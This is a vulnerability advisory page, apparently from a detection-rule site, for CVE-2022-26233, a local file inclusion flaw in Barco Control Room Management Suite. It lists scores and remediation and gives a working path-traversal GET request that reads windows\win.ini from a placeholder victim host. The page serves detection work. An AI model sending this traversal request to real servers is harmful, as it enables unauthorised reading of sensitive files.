🔙 목록으로 돌아가기

CVE-2022-26233: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion

TitleBarco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.84035
CVE IDCVE-2022-26233
CWE IDCWE-22
Tags cve cve2022 barco lfi seclists packetstorm vuln

🔍 Vulnerability Description

Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the “GET /....” substring.

🌐 HTTP Request

GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: www.victim.com

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26233.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-26233.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A